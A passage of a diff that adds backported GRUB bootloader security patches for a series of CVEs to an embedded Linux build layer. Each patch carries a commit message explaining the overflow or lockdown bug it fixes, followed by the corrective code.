+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch
@@ -0,0 +1,61 @@
+From 73f214761cff76a18a2a867976bdd3a9adb00b67 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 14:44:38 +0100
+Subject: [PATCH] loader/xnu: Don't allow loading extension and packages when
+ locked down
+
+The shim_lock verifier validates the XNU kernels but no its extensions
+and packages. Prevent these to be loaded when the GRUB is locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c5565135f12400a925ee901b25984e7af4442f5]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 31 +++++++++++++++++--------------
+ 1 file changed, 17 insertions(+), 14 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 77d7060..07232d2 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -1482,20 +1482,23 @@ GRUB_MOD_INIT(xnu)
+ N_("Load XNU image."));
+ cmd_kernel64 = grub_register_command ("xnu_kernel64", grub_cmd_xnu_kernel64,
+ 0, N_("Load 64-bit XNU image."));
+- cmd_mkext = grub_register_command ("xnu_mkext", grub_cmd_xnu_mkext, 0,
+- N_("Load XNU extension package."));
+- cmd_kext = grub_register_command ("xnu_kext", grub_cmd_xnu_kext, 0,
+- N_("Load XNU extension."));
+- cmd_kextdir = grub_register_command ("xnu_kextdir", grub_cmd_xnu_kextdir,
+- /* TRANSLATORS: OSBundleRequired is a
+- variable name in xnu extensions
+- manifests. It behaves mostly like
+- GNU/Linux runlevels.
+- */
+- N_("DIRECTORY [OSBundleRequired]"),
+- /* TRANSLATORS: There are many extensions
+- in extension directory. */
+- N_("Load XNU extension directory."));
++ cmd_mkext = grub_register_command_lockdown ("xnu_mkext", grub_cmd_xnu_mkext, 0,
++ N_("Load XNU extension package."));
++ cmd_kext = grub_register_command_lockdown ("xnu_kext", grub_cmd_xnu_kext, 0,
++ N_("Load XNU extension."));
++ cmd_kextdir = grub_register_command_lockdown ("xnu_kextdir", grub_cmd_xnu_kextdir,
++ /*
++ * TRANSLATORS: OSBundleRequired is
++ * a variable name in xnu extensions
++ * manifests. It behaves mostly like
++ * GNU/Linux runlevels.
++ */
++ N_("DIRECTORY [OSBundleRequired]"),
++ /*
++ * TRANSLATORS: There are many extensions
++ * in extension directory.
++ */
++ N_("Load XNU extension directory."));
+ cmd_ramdisk = grub_register_command ("xnu_ramdisk", grub_cmd_xnu_ramdisk, 0,
+ /* TRANSLATORS: ramdisk here isn't identifier. It can be translated. */
+ N_("Load XNU ramdisk. "
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch
new file mode 100644
index 0000000000..e5d372a2b1
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch
@@ -0,0 +1,65 @@
+From dcc5a434e59f721b03cc809db0375a24aa2ac6d0 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Sat, 7 Nov 2020 01:03:18 +0100
+Subject: [PATCH] docs: Document the cutmem command
+
+The command is not present in the docs/grub.texi user documentation.
+
+Reported-by: Daniel Kiper <daniel.kiper@oracle.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com>
+Reviewed-by: Javier Martinez Canillas <javierm@redhat.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=f05e79a0143beb2d9a482a3ebf4fe0ce76778122]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index ccf1908..ae85f55 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -3892,6 +3892,7 @@ you forget a command, you can run the command @command{help}
+ * cpuid:: Check for CPU features
+ * crc:: Compute or check CRC32 checksums
+ * cryptomount:: Mount a crypto device
++* cutmem:: Remove memory regions
+ * date:: Display or set current date and time
+ * devicetree:: Load a device tree blob
+ * distrust:: Remove a pubkey from trusted keys
+@@ -4051,6 +4052,8 @@ this page is to be filtered. This syntax makes it easy to represent patterns
+ that are often result of memory damage, due to physical distribution of memory
+ cells.
+
++The command is similar to @command{cutmem} command.
++
+ Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
+ This prevents removing EFI memory regions to potentially subvert the
+ security mechanisms provided by the UEFI secure boot.
+@@ -4214,6 +4217,24 @@ GRUB suports devices encrypted using LUKS and geli. Note that necessary modules
+ be used.
+ @end deffn
+
++@node cutmem
++@subsection cutmem
++
++@deffn Command cutmem from[K|M|G] to[K|M|G]
++Remove any memory regions in specified range.
++@end deffn
++
++This command notifies the memory manager that specified regions of RAM ought to
++be filtered out. This remains in effect after a payload kernel has been loaded
++by GRUB, as long as the loaded kernel obtains its memory map from GRUB. Kernels
++that support this include Linux, GNU Mach, the kernel of FreeBSD and Multiboot
++kernels in general.
++
++The command is similar to @command{badram} command.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This prevents removing EFI memory regions to potentially subvert the
++ security mechanisms provided by the UEFI secure boot.
+
+ @node date
+ @subsection date
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-20225.patch b/meta/recipes-bsp/grub/files/CVE-2021-20225.patch
new file mode 100644
index 0000000000..b864febe62
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-20225.patch
@@ -0,0 +1,58 @@
+From 2a330dba93ff11bc00eda76e9419bc52b0c7ead6 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 22 Jan 2021 16:07:29 +1100
+Subject: lib/arg: Block repeated short options that require an argument
+
+Fuzzing found the following crash:
+
+ search -hhhhhhhhhhhhhf
+
+We didn't allocate enough option space for 13 hints because the
+allocation code counts the number of discrete arguments (i.e. argc).
+However, the shortopt parsing code will happily keep processing
+a combination of short options without checking if those short
+options require an argument. This means you can easily end writing
+past the allocated option space.
+
+This fixes a OOB write which can cause heap corruption.
+
+Fixes: CVE-2021-20225
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=2a330dba93ff11bc00eda76e9419bc52b0c7ead6]
+CVE: CVE-2021-20225
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/lib/arg.c | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/grub-core/lib/arg.c b/grub-core/lib/arg.c
+index 3288609..537c5e9 100644
+--- a/grub-core/lib/arg.c
++++ b/grub-core/lib/arg.c
+@@ -299,6 +299,19 @@ grub_arg_parse (grub_extcmd_t cmd, int argc, char **argv,
+ it can have an argument value. */
+ if (*curshort)
+ {
++ /*
++ * Only permit further short opts if this one doesn't
++ * require a value.
++ */
++ if (opt->type != ARG_TYPE_NONE &&
++ !(opt->flags & GRUB_ARG_OPTION_OPTIONAL))
++ {
++ grub_error (GRUB_ERR_BAD_ARGUMENT,
++ N_("missing mandatory option for `%s'"),
++ opt->longarg);
++ goto fail;
++ }
++
+ if (parse_option (cmd, opt, 0, usr) || grub_errno)
+ goto fail;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-20233.patch b/meta/recipes-bsp/grub/files/CVE-2021-20233.patch
new file mode 100644
index 0000000000..d2069afc18
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-20233.patch
@@ -0,0 +1,50 @@
+From 2f533a89a8dfcacbf2c9dbc77d910f111f24bf33 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 22 Jan 2021 17:10:48 +1100
+Subject: commands/menuentry: Fix quoting in setparams_prefix()
+
+Commit 9acdcbf32542 (use single quotes in menuentry setparams command)
+says that expressing a quoted single quote will require 3 characters. It
+actually requires (and always did require!) 4 characters:
+
+ str: a'b => a'\''b
+ len: 3 => 6 (2 for the letters + 4 for the quote)
+
+This leads to not allocating enough memory and thus out of bounds writes
+that have been observed to cause heap corruption.
+
+Allocate 4 bytes for each single quote.
+
+Commit 22e7dbb2bb81 (Fix quoting in legacy parser.) does the same
+quoting, but it adds 3 as extra overhead on top of the single byte that
+the quote already needs. So it's correct.
+
+Fixes: 9acdcbf32542 (use single quotes in menuentry setparams command)
+Fixes: CVE-2021-20233
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=2f533a89a8dfcacbf2c9dbc77d910f111f24bf33]
+CVE: CVE-2021-20233
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/commands/menuentry.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/commands/menuentry.c b/grub-core/commands/menuentry.c
+index 9164df7..720e6d8 100644
+--- a/grub-core/commands/menuentry.c
++++ b/grub-core/commands/menuentry.c
+@@ -230,7 +230,7 @@ setparams_prefix (int argc, char **args)
+ len += 3; /* 3 = 1 space + 2 quotes */
+ p = args[i];
+ while (*p)
+- len += (*p++ == '\'' ? 3 : 1);
++ len += (*p++ == '\'' ? 4 : 1);
+ }
+
+ result = grub_malloc (len + 2);
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3695.patch b/meta/recipes-bsp/grub/files/CVE-2021-3695.patch
new file mode 100644
index 0000000000..7d6e805725
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3695.patch
@@ -0,0 +1,178 @@
+From 0693d672abcf720419f86c56bda6428c540e2bb1 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 20 Jul 2022 10:01:35 +0530
+Subject: [PATCH] CVE-2021-3695
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=e623866d9286410156e8b9d2c82d6253a1b22d08]
+CVE: CVE-2021-3695
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+ video/readers/png: Drop greyscale support to fix heap out-of-bounds write
+
+A 16-bit greyscale PNG without alpha is processed in the following loop:
+
+ for (i = 0; i < (data->image_width * data->image_height);
+ i++, d1 += 4, d2 += 2)
+{
+ d1[R3] = d2[1];
+ d1[G3] = d2[1];
+ d1[B3] = d2[1];
+}
+
+The increment of d1 is wrong. d1 is incremented by 4 bytes per iteration,
+but there are only 3 bytes allocated for storage. This means that image
+data will overwrite somewhat-attacker-controlled parts of memory - 3 bytes
+out of every 4 following the end of the image.
+
+This has existed since greyscale support was added in 2013 in commit
+3ccf16dff98f (grub-core/video/readers/png.c: Support grayscale).
+
+Saving starfield.png as a 16-bit greyscale image without alpha in the gimp
+and attempting to load it causes grub-emu to crash - I don't think this code
+has ever worked.
+
+Delete all PNG greyscale support.
+
+Fixes: CVE-2021-3695
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/png.c | 89 ++++-------------------------------
+ 1 file changed, 8 insertions(+), 81 deletions(-)
+
+diff --git a/grub-core/video/readers/png.c b/grub-core/video/readers/png.c
+index 0157ff7..db4a9d4 100644
+--- a/grub-core/video/readers/png.c
++++ b/grub-core/video/readers/png.c
+@@ -100,7 +100,7 @@ struct grub_png_data
+
+ unsigned image_width, image_height;
+ int bpp, is_16bit;
+- int raw_bytes, is_gray, is_alpha, is_palette;
++ int raw_bytes, is_alpha, is_palette;
+ int row_bytes, color_bits;
+ grub_uint8_t *image_data;
+
+@@ -280,13 +280,13 @@ grub_png_decode_image_header (struct grub_png_data *data)
+ data->bpp = 3;
+ else
+ {
+- data->is_gray = 1;
+- data->bpp = 1;
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
++ "png: color type not supported");
+ }
+
+ if ((color_bits != 8) && (color_bits != 16)
+ && (color_bits != 4
+- || !(data->is_gray || data->is_palette)))
++ || !data->is_palette))
+ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
+ "png: bit depth must be 8 or 16");
+
+@@ -315,7 +315,7 @@ grub_png_decode_image_header (struct grub_png_data *data)
+ }
+
+ #ifndef GRUB_CPU_WORDS_BIGENDIAN
+- if (data->is_16bit || data->is_gray || data->is_palette)
++ if (data->is_16bit || data->is_palette)
+ #endif
+ {
+ data->image_data = grub_calloc (data->image_height, data->row_bytes);
+@@ -859,27 +859,8 @@ grub_png_convert_image (struct grub_png_data *data)
+ int shift;
+ int mask = (1 << data->color_bits) - 1;
+ unsigned j;
+- if (data->is_gray)
+- {
+- /* Generic formula is
+- (0xff * i) / ((1U << data->color_bits) - 1)
+- but for allowed bit depth of 1, 2 and for it's
+- equivalent to
+- (0xff / ((1U << data->color_bits) - 1)) * i
+- Precompute the multipliers to avoid division.
+- */
+-
+- const grub_uint8_t multipliers[5] = { 0xff, 0xff, 0x55, 0x24, 0x11 };
+- for (i = 0; i < (1U << data->color_bits); i++)
+- {
+- grub_uint8_t col = multipliers[data->color_bits] * i;
+- palette[i][0] = col;
+- palette[i][1] = col;
+- palette[i][2] = col;
+- }
+- }
+- else
+- grub_memcpy (palette, data->palette, 3 << data->color_bits);
++
++ grub_memcpy (palette, data->palette, 3 << data->color_bits);
+ d1c = d1;
+ d2c = d2;
+ for (j = 0; j < data->image_height; j++, d1c += data->image_width * 3,
+@@ -917,61 +898,7 @@ grub_png_convert_image (struct grub_png_data *data)
+ return;
+ }
+
+- if (data->is_gray)
+- {
+- switch (data->bpp)
+- {
+- case 4:
+- /* 16-bit gray with alpha. */
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 4, d2 += 4)
+- {
+- d1[R4] = d2[3];
+- d1[G4] = d2[3];
+- d1[B4] = d2[3];
+- d1[A4] = d2[1];
+- }
+- break;
+- case 2:
+- if (data->is_16bit)
+- /* 16-bit gray without alpha. */
+- {
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 4, d2 += 2)
+- {
+- d1[R3] = d2[1];
+- d1[G3] = d2[1];
+- d1[B3] = d2[1];
+- }
+- }
+- else
+- /* 8-bit gray with alpha. */
+- {
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 4, d2 += 2)
+- {
+- d1[R4] = d2[1];
+- d1[G4] = d2[1];
+- d1[B4] = d2[1];
+- d1[A4] = d2[0];
+- }
+- }
+- break;
+- /* 8-bit gray without alpha. */
+- case 1:
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 3, d2++)
+- {
+- d1[R3] = d2[0];
+- d1[G3] = d2[0];
+- d1[B3] = d2[0];
+- }
+- break;
+- }
+- return;
+- }
+-
+- {
++ {
+ /* Only copy the upper 8 bit. */
+ #ifndef GRUB_CPU_WORDS_BIGENDIAN
+ for (i = 0; i < (data->image_width * data->image_height * data->bpp >> 1);
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3696.patch b/meta/recipes-bsp/grub/files/CVE-2021-3696.patch
new file mode 100644
index 0000000000..ef6da945c4
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3696.patch
@@ -0,0 +1,46 @@
+From b18ce59d6496a9313d75f9497a0efac61dcf4191 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 20 Jul 2022 10:05:42 +0530
+Subject: [PATCH] CVE-2021-3696
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=210245129c932dc9e1c2748d9d35524fb95b5042]
+CVE: CVE-2021-3696
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+video/readers/png: Avoid heap OOB R/W inserting huff table items
+
+In fuzzing we observed crashes where a code would attempt to be inserted
+into a huffman table before the start, leading to a set of heap OOB reads
+and writes as table entries with negative indices were shifted around and
+the new code written in.
+
+Catch the case where we would underflow the array and bail.
+
+Fixes: CVE-2021-3696
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/png.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/grub-core/video/readers/png.c b/grub-core/video/readers/png.c
+index 36b3f10..3c05951 100644
+--- a/grub-core/video/readers/png.c
++++ b/grub-core/video/readers/png.c
+@@ -416,6 +416,13 @@ grub_png_insert_huff_item (struct huff_table *ht, int code, int len)
+ for (i = len; i < ht->max_length; i++)
+ n += ht->maxval[i];
+
++ if (n > ht->num_values)
++ {
++ grub_error (GRUB_ERR_BAD_FILE_TYPE,
++ "png: out of range inserting huffman table item");
++ return;
++ }
++
+ for (i = 0; i < n; i++)
+ ht->values[ht->num_values - i] = ht->values[ht->num_values - i - 1];
+
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3697.patch b/meta/recipes-bsp/grub/files/CVE-2021-3697.patch
new file mode 100644
index 0000000000..be15e7d1f2
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3697.patch
@@ -0,0 +1,82 @@
+From 4de9de9d14f4ac27229e45514627534e32cc4406 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 19 Jul 2022 11:13:02 +0530
+Subject: [PATCH] CVE-2021-3697
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=22a3f97d39f6a10b08ad7fd1cc47c4dcd10413f6]
+CVE: CVE-2021-3697
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+video/readers/jpeg: Block int underflow -> wild pointer write
+
+Certain 1 px wide images caused a wild pointer write in
+grub_jpeg_ycrcb_to_rgb(). This was caused because in grub_jpeg_decode_data(),
+we have the following loop:
+
+for (; data->r1 < nr1 && (!data->dri || rst);
+ data->r1++, data->bitmap_ptr += (vb * data->image_width - hb * nc1) * 3)
+
+We did not check if vb * width >= hb * nc1.
+
+On a 64-bit platform, if that turns out to be negative, it will underflow,
+be interpreted as unsigned 64-bit, then be added to the 64-bit pointer, so
+we see data->bitmap_ptr jump, e.g.:
+
+0x6180_0000_0480 to
+0x6181_0000_0498
+ ^
+ ~--- carry has occurred and this pointer is now far away from
+ any object.
+
+On a 32-bit platform, it will decrement the pointer, creating a pointer
+that won't crash but will overwrite random data.
+
+Catch the underflow and error out.
+
+Fixes: CVE-2021-3697
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/jpeg.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/video/readers/jpeg.c b/grub-core/video/readers/jpeg.c
+index 31359a4..545a60b 100644
+--- a/grub-core/video/readers/jpeg.c
++++ b/grub-core/video/readers/jpeg.c
+@@ -23,6 +23,7 @@
+ #include <grub/mm.h>
+ #include <grub/misc.h>
+ #include <grub/bufio.h>
++#include <grub/safemath.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -617,6 +618,7 @@ static grub_err_t
+ grub_jpeg_decode_data (struct grub_jpeg_data *data)
+ {
+ unsigned c1, vb, hb, nr1, nc1;
++ unsigned stride_a, stride_b, stride;
+ int rst = data->dri;
+
+ vb = 8 << data->log_vs;
+@@ -624,8 +626,14 @@ grub_jpeg_decode_data (struct grub_jpeg_data *data)
+ nr1 = (data->image_height + vb - 1) >> (3 + data->log_vs);
+ nc1 = (data->image_width + hb - 1) >> (3 + data->log_hs);
+
++ if (grub_mul(vb, data->image_width, &stride_a) ||
++ grub_mul(hb, nc1, &stride_b) ||
++ grub_sub(stride_a, stride_b, &stride))
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
++ "jpeg: cannot decode image with these dimensions");
++
+ for (; data->r1 < nr1 && (!data->dri || rst);
+- data->r1++, data->bitmap_ptr += (vb * data->image_width - hb * nc1) * 3)
++ data->r1++, data->bitmap_ptr += stride * 3)
+ for (c1 = 0; c1 < nc1 && (!data->dri || rst);
+ c1++, rst--, data->bitmap_ptr += hb * 3)
+ {
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3981.patch b/meta/recipes-bsp/grub/files/CVE-2021-3981.patch
new file mode 100644
index 0000000000..e27027ea65
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3981.patch
@@ -0,0 +1,32 @@
+From 67740c43c9326956ea5cd6be77f813b5499a56a5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 27 Jun 2022 10:15:29 +0530
+Subject: [PATCH] CVE-2021-3981
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/diff/util/grub-mkconfig.in?id=0adec29674561034771c13e446069b41ef41e4d4]
+CVE: CVE-2021-3981
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ util/grub-mkconfig.in | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/util/grub-mkconfig.in b/util/grub-mkconfig.in
+index 9f477ff..ead94a6 100644
+--- a/util/grub-mkconfig.in
++++ b/util/grub-mkconfig.in
+@@ -287,7 +287,11 @@ and /etc/grub.d/* files or please file a bug report with
+ exit 1
+ else
+ # none of the children aborted with error, install the new grub.cfg
+- mv -f ${grub_cfg}.new ${grub_cfg}
++ oldumask=$(umask)
++ umask 077
++ cat ${grub_cfg}.new > ${grub_cfg}
++ umask $oldumask
++ rm -f ${grub_cfg}.new
+ fi
+ fi
+
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-2601.patch b/meta/recipes-bsp/grub/files/CVE-2022-2601.patch
new file mode 100644
index 0000000000..090f693be3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-2601.patch
@@ -0,0 +1,87 @@
+From e8060722acf0bcca037982d7fb29472363ccdfd4 Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Fri, 5 Aug 2022 01:58:27 +0800
+Subject: [PATCH] font: Fix several integer overflows in
+ grub_font_construct_glyph()
+
+This patch fixes several integer overflows in grub_font_construct_glyph().
+Glyphs of invalid size, zero or leading to an overflow, are rejected.
+The inconsistency between "glyph" and "max_glyph_size" when grub_malloc()
+returns NULL is fixed too.
+
+Fixes: CVE-2022-2601
+
+Reported-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=768e1ef2fc159f6e14e7246e4be09363708ac39e]
+CVE: CVE-2022-2601
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 29 +++++++++++++++++------------
+ 1 file changed, 17 insertions(+), 12 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index df17dba..f110db9 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -1509,6 +1509,7 @@ grub_font_construct_glyph (grub_font_t hinted_font,
+ struct grub_video_signed_rect bounds;
+ static struct grub_font_glyph *glyph = 0;
+ static grub_size_t max_glyph_size = 0;
++ grub_size_t cur_glyph_size;
+
+ ensure_comb_space (glyph_id);
+
+@@ -1525,29 +1526,33 @@ grub_font_construct_glyph (grub_font_t hinted_font,
+ if (!glyph_id->ncomb && !glyph_id->attributes)
+ return main_glyph;
+
+- if (max_glyph_size < sizeof (*glyph) + (bounds.width * bounds.height + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT)
++ if (grub_video_bitmap_calc_1bpp_bufsz (bounds.width, bounds.height, &cur_glyph_size) ||
++ grub_add (sizeof (*glyph), cur_glyph_size, &cur_glyph_size))
++ return main_glyph;
++
++ if (max_glyph_size < cur_glyph_size)
+ {
+ grub_free (glyph);
+- max_glyph_size = (sizeof (*glyph) + (bounds.width * bounds.height + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT) * 2;
+- if (max_glyph_size < 8)
+- max_glyph_size = 8;
+- glyph = grub_malloc (max_glyph_size);
++ if (grub_mul (cur_glyph_size, 2, &max_glyph_size))
++ max_glyph_size = 0;
++ glyph = max_glyph_size > 0 ? grub_malloc (max_glyph_size) : NULL;
+ }
+ if (!glyph)
+ {
++ max_glyph_size = 0;
+ grub_errno = GRUB_ERR_NONE;
+ return main_glyph;
+ }
+
+- grub_memset (glyph, 0, sizeof (*glyph)
+- + (bounds.width * bounds.height
+- + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT);
++ grub_memset (glyph, 0, cur_glyph_size);
+
+ glyph->font = main_glyph->font;
+- glyph->width = bounds.width;
+- glyph->height = bounds.height;
+- glyph->offset_x = bounds.x;
+- glyph->offset_y = bounds.y;
++ if (bounds.width == 0 || bounds.height == 0 ||
++ grub_cast (bounds.width, &glyph->width) ||
++ grub_cast (bounds.height, &glyph->height) ||
++ grub_cast (bounds.x, &glyph->offset_x) ||
++ grub_cast (bounds.y, &glyph->offset_y))
++ return main_glyph;
+
+ if (glyph_id->attributes & GRUB_UNICODE_GLYPH_ATTRIBUTE_MIRROR)
+ grub_font_blit_glyph_mirror (glyph, main_glyph,
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28733.patch b/meta/recipes-bsp/grub/files/CVE-2022-28733.patch
new file mode 100644
index 0000000000..6cfdf20e2d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28733.patch
@@ -0,0 +1,60 @@
+From 415fb5eb83cbd3b5cfc25ac1290f2de4fe3d231c Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 10:48:34 +0530
+Subject: [PATCH] CVE-2022-28733
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=3e4817538de828319ba6d59ced2fbb9b5ca13287]
+CVE: CVE-2022-28733
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/ip: Do IP fragment maths safely
+
+We can receive packets with invalid IP fragmentation information. This
+can lead to rsm->total_len underflowing and becoming very large.
+
+Then, in grub_netbuff_alloc(), we add to this very large number, which can
+cause it to overflow and wrap back around to a small positive number.
+The allocation then succeeds, but the resulting buffer is too small and
+subsequent operations can write past the end of the buffer.
+
+Catch the underflow here.
+
+Fixes: CVE-2022-28733
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/net/ip.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/net/ip.c b/grub-core/net/ip.c
+index ea5edf8..74e4e8b 100644
+--- a/grub-core/net/ip.c
++++ b/grub-core/net/ip.c
+@@ -25,6 +25,7 @@
+ #include <grub/net/netbuff.h>
+ #include <grub/mm.h>
+ #include <grub/priority_queue.h>
++#include <grub/safemath.h>
+ #include <grub/time.h>
+
+ struct iphdr {
+@@ -512,7 +513,14 @@ grub_net_recv_ip4_packets (struct grub_net_buff *nb,
+ {
+ rsm->total_len = (8 * (grub_be_to_cpu16 (iph->frags) & OFFSET_MASK)
+ + (nb->tail - nb->data));
+- rsm->total_len -= ((iph->verhdrlen & 0xf) * sizeof (grub_uint32_t));
++
++ if (grub_sub (rsm->total_len, (iph->verhdrlen & 0xf) * sizeof (grub_uint32_t),
++ &rsm->total_len))
++ {
++ grub_dprintf ("net", "IP reassembly size underflow\n");
++ return GRUB_ERR_NONE;
++ }
++
+ rsm->asm_netbuff = grub_netbuff_alloc (rsm->total_len);
+ if (!rsm->asm_netbuff)
+ {
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28734.patch b/meta/recipes-bsp/grub/files/CVE-2022-28734.patch
new file mode 100644
index 0000000000..577ec10bea
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28734.patch
@@ -0,0 +1,67 @@
+From f03f09c2a07eae7f3a4646e33a406ae2689afb9e Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 10:59:41 +0530
+Subject: [PATCH] CVE-2022-28734
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=b26b4c08e7119281ff30d0fb4a6169bd2afa8fe4]
+CVE: CVE-2022-28734
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/http: Fix OOB write for split http headers
+
+GRUB has special code for handling an http header that is split
+across two packets.
+
+The code tracks the end of line by looking for a "\n" byte. The
+code for split headers has always advanced the pointer just past the
+end of the line, whereas the code that handles unsplit headers does
